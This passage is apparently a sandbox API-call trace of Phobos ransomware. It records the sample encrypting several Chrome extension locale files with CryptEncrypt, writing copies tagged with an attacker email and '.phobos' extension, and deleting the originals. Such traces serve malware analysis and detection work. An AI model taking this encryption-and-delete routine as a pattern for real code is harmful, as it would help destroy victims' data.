lpFileSize=0x2a0fb08*=224) returned 1 [0148.234] CloseHandle (hObject=0x18c) returned 1 [0148.234] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json")) returned 0x2020 [0148.234] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.234] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.234] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.235] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0148.235] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.235] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe0, lpOverlapped=0x0) returned 1 [0148.236] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0148.236] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0148.237] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0148.237] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.237] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0148.237] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.237] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0148.237] CryptDestroyKey (hKey=0xa32d68) returned 1 [0148.237] CloseHandle (hObject=0x18c) returned 1 [0148.237] CloseHandle (hObject=0x138) returned 1 [0148.237] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json")) returned 1 [0148.238] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0148.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.239] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=234) returned 1 [0148.239] CloseHandle (hObject=0x138) returned 1 [0148.239] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json")) returned 0x2020 [0148.239] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.240] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.240] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.240] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0148.240] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.240] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xea, lpOverlapped=0x0) returned 1 [0148.409] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0148.409] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0148.410] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0148.410] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.410] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0148.410] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.410] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0148.410] CryptDestroyKey (hKey=0xa32d68) returned 1 [0148.410] CloseHandle (hObject=0x138) returned 1 [0148.410] CloseHandle (hObject=0x18c) returned 1 [0148.410] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json")) returned 1 [0148.411] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0148.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.412] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=226) returned 1 [0148.412] CloseHandle (hObject=0x18c) returned 1 [0148.412] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json")) returned 0x2020 [0148.412] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.412] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.412] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.413] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0148.413] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.413] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe2, lpOverlapped=0x0) returned 1 [0148.414] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0148.414] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0148.415] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0148.415] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.415] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0148.415] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.415] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0148.415] CryptDestroyKey (hKey=0xa32d68) returned 1 [0148.415] CloseHandle (hObject=0x18c) returned 1 [0148.415] CloseHandle (hObject=0x138) returned 1 [0148.415] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json")) returned 1 [0148.416] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0148.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.417] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=260) returned 1 [0148.417] CloseHandle (hObject=0x138) returned 1 [0148.417] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json")) returned 0x2020 [0148.417] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.417] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.417] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.417] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.417] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.417] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0148.417] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.417] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x104, lpOverlapped=0x0) returned 1 [0148.422] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110, dwBufLen=0x110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110) returned 1 [0148.422] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110, lpOverlapped=0x0) returned 1 [0148.424] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0148.424] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.424] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0148.424] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.424] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0148.424] CryptDestroyKey (hKey=0xa32d68) returned 1 [0148.424] CloseHandle (hObject=0x138) returned 1 [0148.424] CloseHandle (hObject=0x18c) returned 1 [0148.424] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json")) returned 1 [0148.425] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0148.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.426] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=221) returned 1 [0148.426] CloseHandle (hObject=0x18c) returned 1 [0148.426] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json")) returned 0x2020 [0148.427] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.427] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.427] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: 